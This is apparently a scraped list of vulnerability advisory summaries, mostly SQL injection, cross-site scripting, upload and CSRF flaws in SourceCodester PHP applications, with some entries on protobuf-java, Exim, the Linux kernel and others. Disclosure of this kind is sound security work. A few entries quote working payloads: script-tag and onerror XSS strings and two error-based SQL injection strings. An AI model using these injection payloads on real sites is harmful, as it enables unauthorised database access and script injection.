A vulnerability classified as problematic has been found in SourceCodester Simple Cold Storage Management System 1.0. Affected is an unknown function of the file /csms/?page=contact_us of the component Contact Us. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-211194 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file edituser.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211193 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument business leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-211192.
A vulnerability has been found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument change password leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211189 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Cashier Queuing System 1.0. Affected is an unknown function of the component Cashiers Tab. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-211188.
A vulnerability, which was classified as problematic, has been found in SourceCodester Cashier Queuing System 1.0.1. This issue affects some unknown processing of the component User Creation Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-211187.
A vulnerability classified as critical was found in SourceCodester Cashier Queuing System 1.0. This vulnerability affects unknown code of the file /queuing/login.php of the component Login Page. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-211186 is the identifier assigned to this vulnerability.
A vulnerability was found in Exim and classified as problematic. This issue affects some unknown processing of the component Regex Handler. The manipulation leads to use after free. The name of the patch is 4e9ed49f8f12eb331b29bd5b6dc3693c520fddc2. It is recommended to apply a patch to fix this issue. The identifier VDB-211073 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in X.org Server. This affects an unknown part of the file hw/xquartz/X11Controller.m of the component xquartz. The manipulation leads to denial of service. It is recommended to apply a patch to fix this issue. The identifier VDB-211053 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /csms/admin/?page=user/manage_user of the component Avatar Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211049 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the component Add New Storage Handler. The manipulation of the argument Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-211048.
A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /csms/admin/?page=system_info of the component Setting Handler. The manipulation of the argument System Name/System Short Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-211047.
A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /csms/admin/?page=user/list of the component Create User Handler. The manipulation of the argument First Name/Last Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-211046 is the identifier assigned to this vulnerability.
A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is an unknown function of the file mm/memory.c of the component Driver Handler. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211020.
A vulnerability classified as problematic was found in SourceCodester Sanitization Management System 1.0. Affected by this vulnerability is an unknown functionality of the component Quote Requests Tab. The manipulation of the argument Manage Remarks leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-211015.
A vulnerability classified as problematic has been found in SourceCodester Sanitization Management System 1.0. Affected is an unknown function of the component User Creation Handler. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-211014 is the identifier assigned to this vulnerability.
A parsing issue similar to CVE-2022-3171, but with Message-Type Extensions in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above.
A parsing issue similar to CVE-2022-3171, but with textformat in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above.
A vulnerability was found in SourceCodester Sanitization Management System. It has been classified as problematic. Affected is an unknown function of the file /php-sms/admin/. The manipulation of the argument page leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210840.
A vulnerability was found in SourceCodester Sanitization Management System and classified as critical. This issue affects some unknown processing of the file /php-sms/?p=services/view_service. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-210839.
A vulnerability was found in SourceCodester Purchase Order Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the component Supplier Handler. The manipulation of the argument Supplier Name/Address/Contact person/Contact leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210832.
A vulnerability was found in Human Resource Management System 1.0. It has been classified as problematic. This affects an unknown part of the component Leave Handler. The manipulation of the argument Reason leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-210831.
A vulnerability was found in SourceCodester Human Resource Management System 1.0. It has been classified as problematic. Affected is an unknown function of the component Master List. The manipulation of the argument city/state/country/position leads to cross site scripting. It is possible to launch the attack remotely. VDB-210786 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Human Resource Management System 1.0 and classified as critical. This issue affects some unknown processing of the file employeeadd.php of the component Admin Panel. The manipulation leads to improper access controls. The attack may be initiated remotely. The identifier VDB-210785 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Simple Online Public Access Catalog 1.0 and classified as critical. This vulnerability affects unknown code of the file /opac/Actions.php?a=login of the component Admin Login. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210784.
A vulnerability, which was classified as problematic, has been found in SourceCodester Human Resource Management System 1.0. This issue affects some unknown processing of the component Add Employee Handler. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-210773 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Human Resource Management System 1.0. This vulnerability affects unknown code of the component Profile Photo Handler. The manipulation of the argument parameter leads to os command injection. The attack can be initiated remotely. The identifier of this vulnerability is VDB-210772.
The fingerprint module has a vulnerability of overflow in arithmetic addition. Successful exploitation of this vulnerability may result in the acquisition of data from unknown addresses in address mappings.
A vulnerability classified as critical has been found in SourceCodester Human Resource Management System. This affects an unknown part of the file getstatecity.php. The manipulation of the argument ci leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-210717 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Human Resource Management System. It has been rated as critical. Affected by this issue is some unknown functionality of the file city.php. The manipulation of the argument cityedit leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210716.
A vulnerability was found in SourceCodester Human Resource Management System. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file city.php. The manipulation of the argument searccity leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-210715.
A vulnerability was found in SourceCodester Human Resource Management System. It has been classified as critical. Affected is an unknown function of the file getstatecity.php. The manipulation of the argument sc leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-210714 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in Jiusi OA. Affected by this vulnerability is an unknown functionality of the file /jsoa/hntdCustomDesktopActionContent. The manipulation of the argument inforid leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-210709 was assigned to this vulnerability.
A vulnerability classified as critical was found in Mediabridge Medialink. This vulnerability affects unknown code of the file /index.asp. The manipulation leads to improper authentication. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210700.
A vulnerability classified as problematic has been found in puppyCMS up to 5.1. This affects an unknown part of the file /admin/settings.php. The manipulation of the argument site_name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-210699.
A vulnerability has been found in SourceCodester Human Resource Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /employeeview.php of the component Image File Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-210559.
A vulnerability was found in SourceCodester Book Store Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /transcation.php. The manipulation of the argument buyer_name leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-210437 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Book Store Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /category.php. The manipulation of the argument category_name leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-210436.
A vulnerability was found in Crealogix EBICS 7.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /ebics-server/ebics.aspx. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 7.1 is able to address this issue. It is recommended to upgrade the affected component. VDB-210374 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Web-Based Student Clearance System 1.0. Affected by this vulnerability is an unknown functionality of the file edit-photo.php of the component Photo Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-210367.
A vulnerability was found in SourceCodester Web-Based Student Clearance System. It has been classified as critical. Affected is an unknown function of the file /Admin/login.php of the component POST Parameter Handler. The manipulation of the argument txtusername leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-210246 is the identifier assigned to this vulnerability.
A vulnerability has been found in Open5GS up to 2.4.10 and classified as problematic. This vulnerability affects unknown code in the library lib/core/ogs-tlv-msg.c of the component UDP Packet Handler. The manipulation leads to denial of service. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-209686 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Zephyr Project Manager up to 3.2.4. Affected is an unknown function of the file /v1/tasks/create/ of the component REST Call Handler. The manipulation of the argument onanimationstart leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 3.2.5 is able to address this issue. It is recommended to upgrade the affected component. VDB-209370 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Food Ordering Management System. This affects an unknown part of the file router.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-209583.
A vulnerability was found in Open5GS up to 2.4.10. It has been declared as problematic. Affected by this vulnerability is an unknown functionality in the library lib/sbi/client.c of the component AMF. The manipulation leads to denial of service. The attack can be launched remotely. The name of the patch is 724fa568435dae45ef0c3a48b2aabde052afae88. It is recommended to apply a patch to fix this issue. The identifier VDB-209545 was assigned to this vulnerability.
A vulnerability has been found in Nintendo Game Boy Color and classified as problematic. This vulnerability affects unknown code of the component Mobile Adapter GB. The manipulation leads to memory corruption. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-208606 is the identifier assigned to this vulnerability.
A parsing issue with binary data in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above.
A vulnerability classified as critical has been found in codeprojects Online Driving School. This affects an unknown part of the file /login.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-207873 was assigned to this vulnerability.
A vulnerability was found in codeprojects Online Driving School. It has been rated as critical. Affected by this issue is some unknown functionality of the file /registration.php. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-207872.
Bento4 MP4Dump v1.2 was discovered to contain a segmentation violation via an unknown address at /Source/C++/Core/Ap4DataBuffer.cpp:175.
A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file medicine_details.php. The manipulation of the argument medicine leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-207854 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Employee Leave Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/addemployee.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The identifier VDB-207853 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Clinics Patient Management System. Affected by this vulnerability is an unknown functionality of the file index.php of the component Login. The manipulation of the argument user_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-207847.
A vulnerability was found in Sourcecodehero ERP System Project. It has been rated as critical. This issue affects some unknown processing of the file /pages/processlogin.php. The manipulation of the argument user leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-207845 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in oretnom23 Fast Food Ordering System. This issue affects some unknown processing of the file admin/?page=reports. The manipulation of the argument date leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-207425 was assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Simple Task Managing System. This vulnerability affects unknown code. The manipulation of the argument student_add leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-207424.
A vulnerability classified as critical has been found in SourceCodester Simple Task Managing System. This affects an unknown part of the file /loginVaLidation.php. The manipulation of the argument login leads to sql injection. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-207423.
A vulnerability was found in oretnom23 Fast Food Ordering System. It has been rated as critical. Affected by this issue is some unknown functionality of the file ffos/admin/reports/index.php. The manipulation of the argument date leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-207422 is the identifier assigned to this vulnerability.
Due to an insecure design, the Lepin EP-KP001 flash drive through KP001_V19 is vulnerable to an authentication bypass attack that enables an attacker to gain access to the stored encrypted data. Normally, the encrypted disk partition with this data is unlocked by entering the correct passcode (6 to 14 digits) via the keypad and pressing the Unlock button. This authentication is performed by an unknown microcontroller. By replacing this microcontroller on a target device with one from an attacker-controlled Lepin EP-KP001 whose passcode is known, it is possible to successfully unlock the target device and read the stored data in cleartext.
A vulnerability classified as critical was found in SourceCodester Simple and Nice Shopping Cart Script. Affected by this vulnerability is an unknown functionality of the file /mkshop/Men/profile.php. The manipulation of the argument mem_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-207001 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in ConsoleTVs Noxen. Affected is an unknown function of the file /Noxen-master/users.php. The manipulation of the argument create_user_username with the input "&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-207000.
A vulnerability was found in SourceCodester Simple and Nice Shopping Cart Script. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /mkshop/Men/profile.php. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206845 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Laravel 5.1. Affected is an unknown function. The manipulation leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-206688.
A vulnerability, which was classified as critical, was found in SourceCodester Student Management System. Affected is an unknown function of the file index.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-206634 is the identifier assigned to this vulnerability.
A vulnerability was found in laravel 5.1 and classified as problematic. This issue affects some unknown processing. The manipulation leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206501 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Guest Management System. This issue affects some unknown processing of the file /guestmanagement/front.php. The manipulation of the argument rid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206489 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in MotoPress Timetable and Event Schedule up to 1.4.06. This affects an unknown part of the file /wp/?cpmvc_id=1&amp;cpmvc_do_action=mvparse&amp;f=datafeed&amp;calid=1&amp;month_index=1&amp;method=adddetails&amp;id=2 of the component Calendar Handler. The manipulation of the argument Subject/Location/Description leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-206487.
A vulnerability was found in MotoPress Timetable and Event Schedule. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /wp-admin/admin-ajax.php of the component Quick Edit. The manipulation of the argument post_title with the input &lt;img src=x onerror=alert`2`&gt; leads to cross site scripting. The attack may be launched remotely. VDB-206486 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Gym Management System. This affects an unknown part of the file login.php. The manipulation of the argument user_email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-206451.
A vulnerability was found in CrowdStrike Falcon 6.31.14505.0/6.42.15610/6.44.15806. It has been classified as problematic. Affected is an unknown function of the component Uninstallation Handler. The manipulation leads to missing authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 6.40.15409, 6.42.15611 and 6.44.15807 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-206880.
A vulnerability has been found in SourceCodester Simple and Nice Shopping Cart Script and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /mkshope/login.php. The manipulation of the argument msg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206401 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Guest Management System. Affected is an unknown function. The manipulation leads to cleartext storage of passwords in the database. The identifier of this vulnerability is VDB-206400.
A vulnerability classified as critical was found in SourceCodester Guest Management System. This vulnerability affects unknown code of the file index.php. The manipulation of the argument username/pass leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-206398 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Guest Management System. This affects an unknown part of the file myform.php. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206397 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Zoo Management System. It has been classified as critical. Affected is an unknown function of the file /pages/apply_vacancy.php. The manipulation of the argument filename leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-206250 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Zoo Management System and classified as critical. This issue affects some unknown processing of the file /pages/animals.php. The manipulation of the argument class_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206249 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Gas Agency Management System and classified as critical. This vulnerability affects unknown code of the file gasmark/login.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-206248.
A vulnerability, which was classified as critical, was found in SourceCodester Automated Beer Parlour Billing System. This affects an unknown part of the component Login. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-206247.
A vulnerability, which was classified as problematic, has been found in SourceCodester Gym Management System. Affected by this issue is some unknown functionality. The manipulation leads to clickjacking. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-206246 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Student Information System. Affected by this vulnerability is an unknown functionality of the file /admin/students/view_student.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The identifier VDB-206245 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Gas Agency Management System. Affected by this vulnerability is an unknown functionality of the file /gasmark/assets/myimages/oneWord.php. The manipulation of the argument shell leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206173 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Gym Management System. Affected is an unknown function of the file delete_user.php. The manipulation of the argument delete_user leads to denial of service. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-206172.
A vulnerability was found in SourceCodester Library Management System. It has been declared as critical. This vulnerability affects unknown code of the file librarian/student.php. The manipulation of the argument title leads to sql injection. The attack can be initiated remotely. VDB-206170 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Apartment Visitor Management System. It has been classified as problematic. This affects an unknown part of the file profile.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-206169 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Apartment Visitor Management System and classified as critical. Affected by this issue is some unknown functionality of the file action-visitor.php. The manipulation of the argument editid/remark leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-206168.
A vulnerability has been found in SourceCodester Simple Online Book Store System and classified as critical. Affected by this vulnerability is an unknown functionality of the file /obs/bookPerPub.php. The manipulation of the argument bookisbn leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-206167.
A vulnerability, which was classified as critical, was found in SourceCodester Simple Online Book Store System. Affected is an unknown function of the file /obs/book.php. The manipulation of the argument bookisbn leads to sql injection. It is possible to launch the attack remotely. VDB-206166 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in SourceCodester Company Website CMS. This issue affects some unknown processing of the file /dashboard/contact. The manipulation of the argument phone leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206165 was assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Library Management System. This vulnerability affects unknown code of the file /qr/I/. The manipulation of the argument error leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-206164.
A vulnerability classified as problematic has been found in SourceCodester Online Admission System. This affects an unknown part of the file /index.php. The manipulation of the argument student_add leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-206163.
A vulnerability was found in SourceCodester Loan Management System. It has been rated as critical. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-206162 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Company Website CMS 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /dashboard/settings. The manipulation leads to improper authentication. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206161 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Company Website CMS and classified as critical. Affected by this issue is some unknown functionality of the file /dashboard/add-portfolio.php. The manipulation of the argument ufile leads to unrestricted upload. The attack may be launched remotely. The identifier of this vulnerability is VDB-206024.
A vulnerability, which was classified as critical, was found in SourceCodester Company Website CMS. Affected is an unknown function of the file /dashboard/add-service.php of the component Add Service Handler. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. VDB-206022 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Gym Management System. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /mygym/admin/index.php?view_exercises. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206017 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Online Book Store System. It has been classified as problematic. Affected is an unknown function of the file /admin/edit.php. The manipulation of the argument eid leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-206016.
A vulnerability was found in SourceCodester Simple Online Book Store and classified as critical. This issue affects some unknown processing of the file book.php. The manipulation of the argument book_isbn leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-206015.
A vulnerability has been found in SourceCodester Simple Online Book Store System and classified as critical. This vulnerability affects unknown code of the file Admin_ add.php. The manipulation leads to unrestricted upload. The attack can be initiated remotely. VDB-206014 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Gym Management System. This affects an unknown part of the file /admin/add_trainers.php of the component Add New Trainer. The manipulation of the argument trainer_name leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-206013 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Gym Management System. Affected by this issue is some unknown functionality of the file /admin/add_exercises.php of the component Background Management. The manipulation of the argument exer_img leads to unrestricted upload. The attack may be launched remotely. The identifier of this vulnerability is VDB-206012.
A vulnerability was found in SourceCodester Company Website CMS. It has been declared as critical. This vulnerability affects unknown code of the file /dashboard/add-blog.php of the component Add Blog. The manipulation of the argument ufile leads to unrestricted upload. The attack can be initiated remotely. VDB-205882 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Company Website CMS. It has been classified as critical. This affects an unknown part of the file /dashboard/updatelogo.php of the component Background Upload Logo Icon. The manipulation of the argument xfile/ufile leads to unrestricted upload. It is possible to initiate the attack remotely. The identifier VDB-205881 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Gym Management System. It has been rated as critical. Affected by this issue is some unknown functionality of the file /mygym/admin/index.php. The manipulation of the argument edit_tran leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205856.
A vulnerability was found in SourceCodester Gym Management System. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /mygym/admin/login.php. The manipulation of the argument admin_email/admin_pass leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205855.
A vulnerability classified as critical has been found in SEMCMS. This affects an unknown part of the file Ant_Check.php. The manipulation of the argument DID leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205839.
A vulnerability was found in SourceCodester Company Website CMS. It has been rated as problematic. Affected by this issue is some unknown functionality of the file add-blog.php. The manipulation leads to cross site scripting. The attack may be launched remotely. VDB-205838 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee Management System. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /process/aprocess.php. The manipulation of the argument mailuid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205837 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee Management System. It has been classified as critical. Affected is an unknown function of the file /process/eprocess.php. The manipulation of the argument mailuid/pwd leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205836.
A vulnerability has been identified in SINEMA Remote Connect Server (All versions &lt; V3.1). An attacker in machine-in-the-middle could obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack.
A vulnerability was found in SourceCodester Simple Student Information System and classified as critical. This issue affects some unknown processing of the file manage_course.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205835.
A vulnerability has been found in SourceCodester Employee Management System and classified as critical. This vulnerability affects unknown code of the file eloginwel.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-205834 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Gym Management System. This affects an unknown part of the file login.php. The manipulation of the argument user_login with the input 123@xx.com' OR (SELECT 9084 FROM(SELECT COUNT(*),CONCAT(0x7178767871,(SELECT (ELT(9084=9084,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dPvW leads to sql injection. Access to the local network is required for this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-205833 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Online Class and Exam Scheduling System 1.0. Affected by this vulnerability is an unknown functionality of the file /pages/faculty_sched.php. The manipulation of the argument faculty with the input ' OR (SELECT 2078 FROM(SELECT COUNT(*),CONCAT(0x716a717071,(SELECT (ELT(2078=2078,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uYCM leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205831.
